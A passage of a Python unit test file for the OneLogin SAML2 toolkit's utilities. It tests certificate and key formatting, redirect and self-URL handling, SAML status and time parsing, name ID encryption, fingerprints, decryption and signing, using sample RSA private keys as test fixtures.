filename = join(dirname(__file__), '..', '..', '..', 'settings', filename)
else:
filename = join(dirname(__file__), '..', '..', '..', 'settings', 'settings1.json')
if exists(filename):
stream = open(filename, 'r')
settings = json.load(stream)
stream.close()
return settings
else:
raise Exception('Settings json file does not exist')
def file_contents(self, filename):
f = open(filename, 'r')
content = f.read()
f.close()
return content
def testFormatCert(self):
"""
Tests the format_cert method of the OneLogin_Saml2_Utils
"""
settings_info = self.loadSettingsJSON()
cert = settings_info['idp']['x509cert']
self.assertNotIn('-----BEGIN CERTIFICATE-----', cert)
self.assertNotIn('-----END CERTIFICATE-----', cert)
self.assertEqual(len(cert), 860)
formated_cert1 = OneLogin_Saml2_Utils.format_cert(cert)
self.assertIn('-----BEGIN CERTIFICATE-----', formated_cert1)
self.assertIn('-----END CERTIFICATE-----', formated_cert1)
formated_cert2 = OneLogin_Saml2_Utils.format_cert(cert, True)
self.assertEqual(formated_cert1, formated_cert2)
formated_cert3 = OneLogin_Saml2_Utils.format_cert(cert, False)
self.assertNotIn('-----BEGIN CERTIFICATE-----', formated_cert3)
self.assertNotIn('-----END CERTIFICATE-----', formated_cert3)
self.assertEqual(len(formated_cert3), 860)
def testFormatPrivateKey(self):
"""
Tests the format_private_key method of the OneLogin_Saml2_Utils
"""
key = "-----BEGIN RSA PRIVATE KEY-----\nMIICXgIBAAKBgQDivbhR7P516x/S3BqKxupQe0LONoliupiBOesCO3SHbDrl3+q9\nIbfnfmE04rNuMcPsIxB161TdDpIesLCn7c8aPHISKOtPlAeTZSnb8QAu7aRjZq3+\nPbrP5uW3TcfCGPtKTytHOge/OlJbo078dVhXQ14d1EDwXJW1rRXuUt4C8QIDAQAB\nAoGAD4/Z4LWVWV6D1qMIp1Gzr0ZmdWTE1SPdZ7Ej8glGnCzPdguCPuzbhGXmIg0V\nJ5D+02wsqws1zd48JSMXXM8zkYZVwQYIPUsNn5FetQpwxDIMPmhHg+QNBgwOnk8J\nK2sIjjLPL7qY7Itv7LT7Gvm5qSOkZ33RCgXcgz+okEIQMYkCQQDzbTOyDL0c5WQV\n6A2k06T/azdhUdGXF9C0+WkWSfNaovmTgRXh1G+jMlr82Snz4p4/STt7P/XtyWzF\n3pkVgZr3AkEA7nPjXwHlttNEMo6AtxHd47nizK2NUN803ElIUT8P9KSCoERmSXq6\n6PDekGNic4ldpsSvOeYCk8MAYoDBy9kvVwJBAMLgX4xg6lzhv7hR5+pWjTb1rIY6\nrCHbrPfU264+UZXz9v2BT/VUznLF81WMvStD9xAPHpFS6R0OLghSZhdzhI0CQQDL\n8Duvfxzrn4b9QlmduV8wLERoT6rEVxKLsPVz316TGrxJvBZLk/cV0SRZE1cZf4uk\nXSWMfEcJ/0Zt+LdG1CqjAkEAqwLSglJ9Dy3HpgMz4vAAyZWzAxvyA1zW0no9GOLc\nPQnYaNUN/Fy2SYtETXTb0CQ9X1rt8ffkFP7ya+5TC83aMg==\n-----END RSA PRIVATE KEY-----\n"
formated_key = OneLogin_Saml2_Utils.format_private_key(key, True)
self.assertIn('-----BEGIN RSA PRIVATE KEY-----', formated_key)
self.assertIn('-----END RSA PRIVATE KEY-----', formated_key)
self.assertEqual(len(formated_key), 891)
formated_key = OneLogin_Saml2_Utils.format_private_key(key, False)
self.assertNotIn('-----BEGIN RSA PRIVATE KEY-----', formated_key)
self.assertNotIn('-----END RSA PRIVATE KEY-----', formated_key)
self.assertEqual(len(formated_key), 816)
key_2 = "-----BEGIN PRIVATE KEY-----\nMIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAM62buSW9Zgh7CmZ\nouJekK0ac9sgEZkspemjv7SyE6Hbdz+KmUr3C7MI6JuPfVyJbxvMDf3FbgBBK7r5\nyfGgehXwplLMZj8glvV3NkdLMLPWmaw9U5sOzRoym46pVvsEo1PUL2qDK5Wrsm1g\nuY1KIDSHL59NQ7PzDKgm1dxioeXFAgMBAAECgYA/fvRzTReloo3rfWD2Tfv84EpE\nPgaJ2ZghO4Zwl97F8icgIo/R4i760Lq6xgnI+gJiNHz7vcB7XYl0RrRMf3HgbA7z\npJxREmOVltESDHy6lH0TmCdv9xMmHltB+pbGOhqBvuGgFbEOR73lDDV0ln2rEITJ\nA2zjYF+hWe8b0JFeQQJBAOsIIIlHAMngjhCQDD6kla/vce972gCFU7ZeFw16ZMmb\n8W4rGRfQoQWYxSLAFIFsYewSBTccanyYbBNe3njki3ECQQDhJ4cgV6VpTwez4dkp\nU/xCHKoReedAEJhXucTNGpiIqu+TDgIz9aRbrgnUKkS1s06UJhcDRTl/+pCSRRt/\nCA2VAkBkPw4pn1hNwvK1S8t9OJQD+5xcKjZcvIFtKoqonAi7GUGL3OQSDVFw4q1K\n2iSk40aM+06wJ/WfeR+3z2ISrGBxAkAJ20YiF1QpcQlASbHNCl0vs7uKOlDyUAer\nR3mjFPf6e6kzQdi815MTZGIPxK3vWmMlPymgvgYPYTO1A4t5myulAkEA1QioAWcJ\noO26qhUlFRBCR8BMJoVPImV7ndVHE7usHdJvP7V2P9RyuRcMCTVul8RRmyoh/+yG\n4ghMaHo/v0YY5Q==\n-----END PRIVATE KEY-----\n"
formated_key_2 = OneLogin_Saml2_Utils.format_private_key(key_2, True)
self.assertIn('-----BEGIN PRIVATE KEY-----', formated_key_2)
self.assertIn('-----END PRIVATE KEY-----', formated_key_2)
self.assertEqual(len(formated_key_2), 916)
formated_key_2 = OneLogin_Saml2_Utils.format_private_key(key_2, False)
self.assertNotIn('-----BEGIN PRIVATE KEY-----', formated_key_2)
self.assertNotIn('-----END PRIVATE KEY-----', formated_key_2)
self.assertEqual(len(formated_key_2), 848)
key_3 = 'MIICdgIBADANBgkqhkiG9w0BAQEFAASCAmAwggJcAgEAAoGBAM62buSW9Zgh7CmZouJekK0ac9sgEZkspemjv7SyE6Hbdz+KmUr3C7MI6JuPfVyJbxvMDf3FbgBBK7r5yfGgehXwplLMZj8glvV3NkdLMLPWmaw9U5sOzRoym46pVvsEo1PUL2qDK5Wrsm1guY1KIDSHL59NQ7PzDKgm1dxioeXFAgMBAAECgYA/fvRzTReloo3rfWD2Tfv84EpEPgaJ2ZghO4Zwl97F8icgIo/R4i760Lq6xgnI+gJiNHz7vcB7XYl0RrRMf3HgbA7zpJxREmOVltESDHy6lH0TmCdv9xMmHltB+pbGOhqBvuGgFbEOR73lDDV0ln2rEITJA2zjYF+hWe8b0JFeQQJBAOsIIIlHAMngjhCQDD6kla/vce972gCFU7ZeFw16ZMmb8W4rGRfQoQWYxSLAFIFsYewSBTccanyYbBNe3njki3ECQQDhJ4cgV6VpTwez4dkpU/xCHKoReedAEJhXucTNGpiIqu+TDgIz9aRbrgnUKkS1s06UJhcDRTl/+pCSRRt/CA2VAkBkPw4pn1hNwvK1S8t9OJQD+5xcKjZcvIFtKoqonAi7GUGL3OQSDVFw4q1K2iSk40aM+06wJ/WfeR+3z2ISrGBxAkAJ20YiF1QpcQlASbHNCl0vs7uKOlDyUAerR3mjFPf6e6kzQdi815MTZGIPxK3vWmMlPymgvgYPYTO1A4t5myulAkEA1QioAWcJoO26qhUlFRBCR8BMJoVPImV7ndVHE7usHdJvP7V2P9RyuRcMCTVul8RRmyoh/+yG4ghMaHo/v0YY5Q=='
formated_key_3 = OneLogin_Saml2_Utils.format_private_key(key_3, True)
self.assertIn('-----BEGIN RSA PRIVATE KEY-----', formated_key_3)
self.assertIn('-----END RSA PRIVATE KEY-----', formated_key_3)
self.assertEqual(len(formated_key_3), 924)
formated_key_3 = OneLogin_Saml2_Utils.format_private_key(key_3, False)
self.assertNotIn('-----BEGIN PRIVATE KEY-----', formated_key_3)
self.assertNotIn('-----END PRIVATE KEY-----', formated_key_3)
self.assertNotIn('-----BEGIN RSA PRIVATE KEY-----', formated_key_3)
self.assertNotIn('-----END RSA PRIVATE KEY-----', formated_key_3)
self.assertEqual(len(formated_key_3), 848)
def testRedirect(self):
"""
Tests the redirect method of the OneLogin_Saml2_Utils
"""
request_data = {
'http_host': 'example.com'
}
# Check relative and absolute
hostname = OneLogin_Saml2_Utils.get_self_host(request_data)
url = 'http://%s/example' % hostname
url2 = '/example'
target_url = OneLogin_Saml2_Utils.redirect(url, {}, request_data)
target_url2 = OneLogin_Saml2_Utils.redirect(url2, {}, request_data)
self.assertEqual(target_url, target_url2)
# Check that accept http/https and reject other protocols
url3 = 'https://%s/example?test=true' % hostname
url4 = 'ftp://%s/example' % hostname
target_url3 = OneLogin_Saml2_Utils.redirect(url3, {}, request_data)
self.assertIn('test=true', target_url3)
self.assertRaisesRegexp(Exception, 'Redirect to invalid URL',
OneLogin_Saml2_Utils.redirect, url4, {}, request_data)
# Review parameter prefix
parameters1 = {
'value1': 'a'
}
target_url5 = OneLogin_Saml2_Utils.redirect(url, parameters1, request_data)
self.assertEqual('http://%s/example?value1=a' % hostname, target_url5)
target_url6 = OneLogin_Saml2_Utils.redirect(url3, parameters1, request_data)
self.assertEqual('https://%s/example?test=true&value1=a' % hostname, target_url6)
# Review parameters
parameters2 = {
'alphavalue': 'a',
'numvaluelist': ['1', '2'],
'testing': None
}
target_url7 = OneLogin_Saml2_Utils.redirect(url, parameters2, request_data)
parameters2_decoded = {"alphavalue": "alphavalue=a", "numvaluelist": "numvaluelist[]=1&numvaluelist[]=2", "testing": "testing"}
parameters2_str = "&".join(parameters2_decoded[x] for x in parameters2)
self.assertEqual('http://%s/example?%s' % (hostname, parameters2_str), target_url7)
parameters3 = {
'alphavalue': 'a',
'emptynumvaluelist': [],
'numvaluelist': [''],
}
parameters3_decoded = {"alphavalue": "alphavalue=a", "numvaluelist": "numvaluelist[]="}
parameters3_str = "&".join((parameters3_decoded[x] for x in parameters3.keys() if x in parameters3_decoded))
target_url8 = OneLogin_Saml2_Utils.redirect(url, parameters3, request_data)
self.assertEqual('http://%s/example?%s' % (hostname, parameters3_str), target_url8)
def testGetselfhost(self):
"""
Tests the get_self_host method of the OneLogin_Saml2_Utils
"""
request_data = {}
self.assertRaisesRegexp(Exception, 'No hostname defined',
OneLogin_Saml2_Utils.get_self_host, request_data)
request_data = {
'server_name': 'example.com'
}
self.assertEqual('example.com', OneLogin_Saml2_Utils.get_self_host(request_data))
request_data = {
'http_host': 'example.com'
}
self.assertEqual('example.com', OneLogin_Saml2_Utils.get_self_host(request_data))
request_data = {
'http_host': 'example.com:443'
}
self.assertEqual('example.com', OneLogin_Saml2_Utils.get_self_host(request_data))
request_data = {
'http_host': 'example.com:ok'
}
self.assertEqual('example.com:ok', OneLogin_Saml2_Utils.get_self_host(request_data))
def testisHTTPS(self):
"""
Tests the is_https method of the OneLogin_Saml2_Utils
"""
request_data = {
'https': 'off'
}
self.assertFalse(OneLogin_Saml2_Utils.is_https(request_data))
request_data = {
'https': 'on'
}
self.assertTrue(OneLogin_Saml2_Utils.is_https(request_data))
request_data = {
'server_port': '80'
}
self.assertFalse(OneLogin_Saml2_Utils.is_https(request_data))
request_data = {
'server_port': '443'
}
self.assertTrue(OneLogin_Saml2_Utils.is_https(request_data))
def testGetSelfURLhost(self):
"""
Tests the get_self_url_host method of the OneLogin_Saml2_Utils
"""
request_data = {
'http_host': 'example.com'
}
self.assertEqual('http://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['server_port'] = '80'
self.assertEqual('http://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['server_port'] = '81'
self.assertEqual('http://example.com:81', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['server_port'] = '443'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
del request_data['server_port']
request_data['https'] = 'on'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['server_port'] = '444'
self.assertEqual('https://example.com:444', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['server_port'] = '443'
request_data['request_uri'] = ''
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['request_uri'] = '/'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['request_uri'] = 'onelogin/'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['request_uri'] = '/onelogin'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data['request_uri'] = 'https://example.com/onelogin/sso'
self.assertEqual('https://example.com', OneLogin_Saml2_Utils.get_self_url_host(request_data))
request_data2 = {
'request_uri': 'example.com/onelogin/sso'
}
self.assertRaisesRegexp(Exception, 'No hostname defined',
OneLogin_Saml2_Utils.get_self_url_host, request_data2)
def testGetSelfURL(self):
"""
Tests the get_self_url method of the OneLogin_Saml2_Utils
"""
request_data = {
'http_host': 'example.com'
}
url = OneLogin_Saml2_Utils.get_self_url_host(request_data)
self.assertEqual(url, OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = ''
self.assertEqual(url, OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = '/'
self.assertEqual(url + '/', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = 'index.html'
self.assertEqual(url + 'index.html', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = '?index.html'
self.assertEqual(url + '?index.html', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = '/index.html'
self.assertEqual(url + '/index.html', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = '/index.html?testing'
self.assertEqual(url + '/index.html?testing', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = '/test/index.html?testing'
self.assertEqual(url + '/test/index.html?testing', OneLogin_Saml2_Utils.get_self_url(request_data))
request_data['request_uri'] = 'https://example.com/testing'
self.assertEqual(url + '/testing', OneLogin_Saml2_Utils.get_self_url(request_data))
def testGetSelfURLNoQuery(self):
"""
Tests the get_self_url_no_query method of the OneLogin_Saml2_Utils
"""
request_data = {
'http_host': 'example.com',
'script_name': '/index.html'
}
url = OneLogin_Saml2_Utils.get_self_url_host(request_data) + request_data['script_name']
self.assertEqual(url, OneLogin_Saml2_Utils.get_self_url_no_query(request_data))
request_data['path_info'] = '/test'
self.assertEqual(url + '/test', OneLogin_Saml2_Utils.get_self_url_no_query(request_data))
def testGetSelfRoutedURLNoQuery(self):
"""
Tests the get_self_routed_url_no_query method of the OneLogin_Saml2_Utils
"""
request_data = {
'http_host': 'example.com',
'request_uri': '/example1/route?x=test',
'query_string': '?x=test'
}
url = OneLogin_Saml2_Utils.get_self_url_host(request_data) + '/example1/route'
self.assertEqual(url, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data))
request_data_2 = {
'http_host': 'example.com',
'request_uri': '',
}
url_2 = OneLogin_Saml2_Utils.get_self_url_host(request_data_2)
self.assertEqual(url_2, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data_2))
request_data_3 = {
'http_host': 'example.com',
}
url_3 = OneLogin_Saml2_Utils.get_self_url_host(request_data_3)
self.assertEqual(url_3, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data_3))
request_data_4 = {
'http_host': 'example.com',
'request_uri': '/example1/route/test/',
'query_string': '?invalid=1'
}
url_4 = OneLogin_Saml2_Utils.get_self_url_host(request_data_4) + '/example1/route/test/'
self.assertEqual(url_4, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data_4))
request_data_5 = {
'http_host': 'example.com',
'request_uri': '/example1/route/test/',
'query_string': ''
}
url_5 = OneLogin_Saml2_Utils.get_self_url_host(request_data_5) + '/example1/route/test/'
self.assertEqual(url_5, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data_5))
request_data_6 = {
'http_host': 'example.com',
'request_uri': '/example1/route/test/',
}
url_6 = OneLogin_Saml2_Utils.get_self_url_host(request_data_6) + '/example1/route/test/'
self.assertEqual(url_6, OneLogin_Saml2_Utils.get_self_routed_url_no_query(request_data_6))
def testGetStatus(self):
"""
Gets the status of a message
"""
xml = self.file_contents(join(self.data_path, 'responses', 'response1.xml.base64'))
xml = b64decode(xml)
dom = etree.fromstring(xml)
status = OneLogin_Saml2_Utils.get_status(dom)
self.assertEqual(OneLogin_Saml2_Constants.STATUS_SUCCESS, status['code'])
xml2 = self.file_contents(join(self.data_path, 'responses', 'invalids', 'status_code_responder.xml.base64'))
xml2 = b64decode(xml2)
dom2 = etree.fromstring(xml2)
status2 = OneLogin_Saml2_Utils.get_status(dom2)
self.assertEqual(OneLogin_Saml2_Constants.STATUS_RESPONDER, status2['code'])
self.assertEqual('', status2['msg'])
xml3 = self.file_contents(join(self.data_path, 'responses', 'invalids', 'status_code_responer_and_msg.xml.base64'))
xml3 = b64decode(xml3)
dom3 = etree.fromstring(xml3)
status3 = OneLogin_Saml2_Utils.get_status(dom3)
self.assertEqual(OneLogin_Saml2_Constants.STATUS_RESPONDER, status3['code'])
self.assertEqual('something_is_wrong', status3['msg'])
xml_inv = self.file_contents(join(self.data_path, 'responses', 'invalids', 'no_status.xml.base64'))
xml_inv = b64decode(xml_inv)
dom_inv = etree.fromstring(xml_inv)
self.assertRaisesRegexp(Exception, 'Missing Status on response',
OneLogin_Saml2_Utils.get_status, dom_inv)
xml_inv2 = self.file_contents(join(self.data_path, 'responses', 'invalids', 'no_status_code.xml.base64'))
xml_inv2 = b64decode(xml_inv2)
dom_inv2 = etree.fromstring(xml_inv2)
self.assertRaisesRegexp(Exception, 'Missing Status Code on response',
OneLogin_Saml2_Utils.get_status, dom_inv2)
def testParseDuration(self):
"""
Tests the parse_duration method of the OneLogin_Saml2_Utils
"""
duration = 'PT1393462294S'
timestamp = 1393876825
parsed_duration = OneLogin_Saml2_Utils.parse_duration(duration, timestamp)
self.assertEqual(2787339119, parsed_duration)
parsed_duration_2 = OneLogin_Saml2_Utils.parse_duration(duration)
self.assertTrue(parsed_duration_2 > parsed_duration)
invalid_duration = 'PT1Y'
self.assertRaisesRegexp(Exception, 'Unrecognised ISO 8601 date format',
OneLogin_Saml2_Utils.parse_duration, invalid_duration)
new_duration = 'P1Y1M'
parsed_duration_4 = OneLogin_Saml2_Utils.parse_duration(new_duration, timestamp)
self.assertEqual(1428091225, parsed_duration_4)
neg_duration = '-P14M'
parsed_duration_5 = OneLogin_Saml2_Utils.parse_duration(neg_duration, timestamp)
self.assertEqual(1357243225, parsed_duration_5)
def testParseSAML2Time(self):
"""
Tests the parse_SAML_to_time method of the OneLogin_Saml2_Utils
"""
time = 1386650371
saml_time = '2013-12-10T04:39:31Z'
self.assertEqual(time, OneLogin_Saml2_Utils.parse_SAML_to_time(saml_time))
self.assertRaisesRegexp(Exception, 'does not match format',
OneLogin_Saml2_Utils.parse_SAML_to_time, 'invalidSAMLTime')
# Now test if toolkit supports miliseconds
saml_time2 = '2013-12-10T04:39:31.120Z'
self.assertEqual(time, OneLogin_Saml2_Utils.parse_SAML_to_time(saml_time2))
def testParseTime2SAML(self):
"""
Tests the parse_time_to_SAML method of the OneLogin_Saml2_Utils
"""
time = 1386650371
saml_time = '2013-12-10T04:39:31Z'
self.assertEqual(saml_time, OneLogin_Saml2_Utils.parse_time_to_SAML(time))
self.assertRaisesRegexp(Exception, 'could not convert string to float',
OneLogin_Saml2_Utils.parse_time_to_SAML, 'invalidtime')
def testGetExpireTime(self):
"""
Tests the get_expire_time method of the OneLogin_Saml2_Utils
"""
self.assertEqual(None, OneLogin_Saml2_Utils.get_expire_time())
self.assertNotEqual(None, OneLogin_Saml2_Utils.get_expire_time('PT360000S'))
self.assertEqual('1291955971', OneLogin_Saml2_Utils.get_expire_time('PT360000S', '2010-12-10T04:39:31Z'))
self.assertEqual('1291955971', OneLogin_Saml2_Utils.get_expire_time('PT360000S', 1291955971))
self.assertNotEqual('3311642371', OneLogin_Saml2_Utils.get_expire_time('PT360000S', '2074-12-10T04:39:31Z'))
self.assertNotEqual('3311642371', OneLogin_Saml2_Utils.get_expire_time('PT360000S', 1418186371))
def testGenerateNameIdWithSPNameQualifier(self):
"""
Tests the generateNameId method of the OneLogin_Saml2_Utils
"""
name_id_value = 'ONELOGIN_ce998811003f4e60f8b07a311dc641621379cfde'
entity_id = 'http://stuff.com/endpoints/metadata.php'
name_id_format = 'urn:oasis:names:tc:SAML:2.0:nameid-format:unspecified'
name_id = OneLogin_Saml2_Utils.generate_name_id(name_id_value, entity_id, name_id_format)
expected_name_id = '<saml:NameID SPNameQualifier="http://stuff.com/endpoints/metadata.php" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:unspecified">ONELOGIN_ce998811003f4e60f8b07a311dc641621379cfde</saml:NameID>'
self.assertEqual(expected_name_id, name_id)
settings_info = self.loadSettingsJSON()
x509cert = settings_info['idp']['x509cert']
key = OneLogin_Saml2_Utils.format_cert(x509cert)
name_id_enc = OneLogin_Saml2_Utils.generate_name_id(name_id_value, entity_id, name_id_format, key)
expected_name_id_enc = '<saml:EncryptedID><xenc:EncryptedData xmlns:xenc="http://www.w3.org/2001/04/xmlenc#" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" Type="http://www.w3.org/2001/04/xmlenc#Element">\n<xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes128-cbc"/>\n<dsig:KeyInfo xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">\n<xenc:EncryptedKey>\n<xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p"/>\n<xenc:CipherData>\n<xenc:CipherValue>'
self.assertIn(expected_name_id_enc, name_id_enc)
def testGenerateNameIdWithSPNameQualifier(self):
"""
Tests the generateNameId method of the OneLogin_Saml2_Utils
"""
name_id_value = 'ONELOGIN_ce998811003f4e60f8b07a311dc641621379cfde'
name_id_format = 'urn:oasis:names:tc:SAML:2.0:nameid-format:unspecified'
name_id = OneLogin_Saml2_Utils.generate_name_id(name_id_value, None, name_id_format)
expected_name_id = '<saml:NameID Format="urn:oasis:names:tc:SAML:2.0:nameid-format:unspecified">ONELOGIN_ce998811003f4e60f8b07a311dc641621379cfde</saml:NameID>'
self.assertEqual(expected_name_id, name_id)
settings_info = self.loadSettingsJSON()
x509cert = settings_info['idp']['x509cert']
key = OneLogin_Saml2_Utils.format_cert(x509cert)
name_id_enc = OneLogin_Saml2_Utils.generate_name_id(name_id_value, None, name_id_format, key)
expected_name_id_enc = '<saml:EncryptedID><xenc:EncryptedData xmlns:xenc="http://www.w3.org/2001/04/xmlenc#" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" Type="http://www.w3.org/2001/04/xmlenc#Element">\n<xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#aes128-cbc"/>\n<dsig:KeyInfo xmlns:dsig="http://www.w3.org/2000/09/xmldsig#">\n<xenc:EncryptedKey>\n<xenc:EncryptionMethod Algorithm="http://www.w3.org/2001/04/xmlenc#rsa-oaep-mgf1p"/>\n<xenc:CipherData>\n<xenc:CipherValue>'
self.assertIn(expected_name_id_enc, name_id_enc)
def testCalculateX509Fingerprint(self):
"""
Tests the calculateX509Fingerprint method of the OneLogin_Saml2_Utils
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
cert_path = settings.get_cert_path()
key = self.file_contents(cert_path + 'sp.key')
cert = self.file_contents(cert_path + 'sp.crt')
self.assertEqual(None, OneLogin_Saml2_Utils.calculate_x509_fingerprint(key))
self.assertEqual('afe71c28ef740bc87425be13a2263d37971da1f9', OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert))
self.assertEqual('afe71c28ef740bc87425be13a2263d37971da1f9', OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert, 'sha1'))
self.assertEqual('c51cfa06c7a49767f6eab18238eae1c56708e29264da3d11f538a12cd2c357ba', OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert, 'sha256'))
self.assertEqual('bc5826e6f9429247254bae5e3c650e6968a36a62d23075eb168134978d88600559c10830c28711b2c29c7947c0c2eb1d', OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert, 'sha384'))
self.assertEqual('3db29251b97559c67988ea0754cb0573fc409b6f75d89282d57cfb75089539b0bbdb2dcd9ec6e032549ecbc466439d5992e18db2cf5494ca2fe1b2e16f348dff', OneLogin_Saml2_Utils.calculate_x509_fingerprint(cert, 'sha512'))
def testDeleteLocalSession(self):
"""
Tests the delete_local_session method of the OneLogin_Saml2_Utils
"""
global local_session_test
local_session_test = 1
OneLogin_Saml2_Utils.delete_local_session()
self.assertEqual(1, local_session_test)
dscb = lambda: self.session_cear()
OneLogin_Saml2_Utils.delete_local_session(dscb)
self.assertEqual(0, local_session_test)
def session_cear(self):
"""
Auxiliar method to test the delete_local_session method of the OneLogin_Saml2_Utils
"""
global local_session_test
local_session_test = 0
def testFormatFingerPrint(self):
"""
Tests the format_finger_print method of the OneLogin_Saml2_Utils
"""
finger_print_1 = 'AF:E7:1C:28:EF:74:0B:C8:74:25:BE:13:A2:26:3D:37:97:1D:A1:F9'
self.assertEqual('afe71c28ef740bc87425be13a2263d37971da1f9', OneLogin_Saml2_Utils.format_finger_print(finger_print_1))
finger_print_2 = 'afe71c28ef740bc87425be13a2263d37971da1f9'
self.assertEqual('afe71c28ef740bc87425be13a2263d37971da1f9', OneLogin_Saml2_Utils.format_finger_print(finger_print_2))
def testDecryptElement(self):
"""
Tests the decrypt_element method of the OneLogin_Saml2_Utils
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
key = settings.get_sp_key()
xml_nameid_enc = b64decode(self.file_contents(join(self.data_path, 'responses', 'response_encrypted_nameid.xml.base64')))
dom_nameid_enc = etree.fromstring(xml_nameid_enc)
encrypted_nameid_nodes = dom_nameid_enc.find('.//saml:EncryptedID', namespaces=OneLogin_Saml2_Constants.NSMAP)
encrypted_data = encrypted_nameid_nodes[0]
decrypted_nameid = OneLogin_Saml2_Utils.decrypt_element(encrypted_data, key)
self.assertEqual('{%s}NameID' % OneLogin_Saml2_Constants.NS_SAML, decrypted_nameid.tag)
self.assertEqual('2de11defd199f8d5bb63f9b7deb265ba5c675c10', decrypted_nameid.text)
xml_assertion_enc = b64decode(self.file_contents(join(self.data_path, 'responses', 'valid_encrypted_assertion_encrypted_nameid.xml.base64')))
dom_assertion_enc = etree.fromstring(xml_assertion_enc)
encrypted_assertion_enc_nodes = dom_assertion_enc.find('.//saml:EncryptedAssertion', namespaces=OneLogin_Saml2_Constants.NSMAP)
encrypted_data_assert = encrypted_assertion_enc_nodes[0]
decrypted_assertion = OneLogin_Saml2_Utils.decrypt_element(encrypted_data_assert, key)
self.assertEqual('{%s}Assertion' % OneLogin_Saml2_Constants.NS_SAML, decrypted_assertion.tag)
self.assertEqual('_6fe189b1c241827773902f2b1d3a843418206a5c97', decrypted_assertion.get('ID'))
encrypted_nameid_nodes = decrypted_assertion.xpath('./saml:Subject/saml:EncryptedID', namespaces=OneLogin_Saml2_Constants.NSMAP)
encrypted_data = encrypted_nameid_nodes[0][0]
decrypted_nameid = OneLogin_Saml2_Utils.decrypt_element(encrypted_data, key)
self.assertEqual('{%s}NameID' % OneLogin_Saml2_Constants.NS_SAML, decrypted_nameid.tag)
self.assertEqual('457bdb600de717891c77647b0806ce59c089d5b8', decrypted_nameid.text)
key_2_file_name = join(self.data_path, 'misc', 'sp2.key')
f = open(key_2_file_name, 'r')
key2 = f.read()
f.close()
self.assertRaises(Exception, OneLogin_Saml2_Utils.decrypt_element, encrypted_data, key2)
key_3_file_name = join(self.data_path, 'misc', 'sp2.key')
f = open(key_3_file_name, 'r')
key3 = f.read()
f.close()
self.assertRaises(Exception, OneLogin_Saml2_Utils.decrypt_element, encrypted_data, key3)
xml_nameid_enc_2 = b64decode(self.file_contents(join(self.data_path, 'responses', 'invalids', 'encrypted_nameID_without_EncMethod.xml.base64')))
dom_nameid_enc_2 = etree.fromstring(xml_nameid_enc_2)
encrypted_nameid_nodes_2 = dom_nameid_enc_2.find('.//saml:EncryptedID', namespaces=OneLogin_Saml2_Constants.NSMAP)
encrypted_data_2 = encrypted_nameid_nodes_2[0]
self.assertRaises(Exception, OneLogin_Saml2_Utils.decrypt_element, encrypted_data_2, key)
xml_nameid_enc_3 = b64decode(self.file_contents(join(self.data_path, 'responses', 'invalids', 'encrypted_nameID_without_keyinfo.xml.base64')))
dom_nameid_enc_3 = etree.fromstring(xml_nameid_enc_3)
encrypted_nameid_nodes_3 = dom_nameid_enc_3.find('.//saml:EncryptedID', namespaces=OneLogin_Saml2_Constants.NSMAP)
encrypted_data_3 = encrypted_nameid_nodes_3[0]
self.assertRaises(Exception, OneLogin_Saml2_Utils.decrypt_element, encrypted_data_3, key)
def testAddSign(self):
"""
Tests the add_sign method of the OneLogin_Saml2_Utils
"""
settings = OneLogin_Saml2_Settings(self.loadSettingsJSON())
key = settings.get_sp_key()
cert = settings.get_sp_cert()
xml_authn = b64decode(self.file_contents(join(self.data_path, 'requests', 'authn_request.xml.base64')))
xml_authn_signed = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_authn, key, cert))
self.assertIn('<ds:SignatureValue>', xml_authn_signed)
res = parseString(xml_authn_signed)
ds_signature = res.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature.tagName)
xml_authn_dom = parseString(xml_authn)
xml_authn_signed_2 = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_authn_dom.toxml(), key, cert))
self.assertIn('<ds:SignatureValue>', xml_authn_signed_2)
res_2 = parseString(xml_authn_signed_2)
ds_signature_2 = res_2.firstChild.firstChild.nextSibling.nextSibling
self.assertIn('ds:Signature', ds_signature_2.tagName)
xml_authn_signed_3 = compat.to_string(OneLogin_Saml2_Utils.add_sign(xml_authn_dom.firstChild.toxml(), key, cert))
